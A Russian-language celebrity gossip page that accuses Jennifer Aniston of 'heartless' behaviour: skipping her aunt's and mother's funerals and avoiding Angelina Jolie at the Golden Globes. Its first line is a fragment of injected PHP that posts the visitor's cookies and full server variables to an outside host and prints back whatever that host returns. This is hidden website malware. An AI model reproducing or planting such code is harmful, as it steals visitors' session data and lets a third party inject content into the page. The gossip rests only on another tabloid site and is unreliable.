array("header"=>"User-Agent: PHP Modules clicktimes\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($clicktimes_result) echo $clicktimes_result; ?>
 
Дженнифер Энистон удивила бессердечным поведением
Как сообщили западные СМИ, в начале ноября 2017 года скончалась тетя 48-летней Дженнифер Энистон — Мэри Папасифакис, родная сестра отца актрисы — Джона. Мэри ушла из жизни после продолжительной болезни.
Папасифакис скончалась от осложнений онкологического заболевания. Энистон не соизволила приехать на похороны Папасифакис. Мало того, хотя Мэри около пяти лет, и лечилась в США, Дженнифер ни разу не удосужилась посетить больную родственницу, уточняет celebrityinsider.org.
Эта история напомнила другой печальный и не слишком лестный для Энистон инцидент из жизни актрисы, связанный с ее мамой Нэнси Доу, скончавшейся в 2016-м году. Энистон тогда не только не приехала на похороны матери, но и даже отказалась забрать ее прах из крематория.
У Нэнси и Дженнифер были непростые отношения. Как рассказала сама актриса, они начали ссориться еще в те времена, когда Энистон была подростком. Потом все стало еще хуже: когда Дженифер стала звездой, Нэнси написала мемуары "От матери и дочери к друзьям: Мемуары", в которых выставила Энистон в весьма невыгодном свете. Они не виделись почти 20 лет.
Напомним, актрисы и по совместительству бывшие жены Брэда Питта – Анджелина Джоли и Дженнифер Энистон стали гостьями 75-й юбилейной церемонии вручения премии "Золотой глобус" в Лос-Анджелесе. На "Золотом глобусе" актрисы вручали награды победителям. На красную дорожку Энистон не вышла, чтобы не столкнуться с Джоли лицом к лицу. Когда Дженнифер Энистон вышла к зрителям вместе с актрисой Кэрол Бернетт вручать награду, Джоли опустила глаза и не смотрела в сторону сцены.
Источник:
Если Вам понравилась или не понравилась статья можете проголосовать за Дженнифер Энистон удивила бессердечным поведением
90290

Реклама на сайте

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Реклама на сайте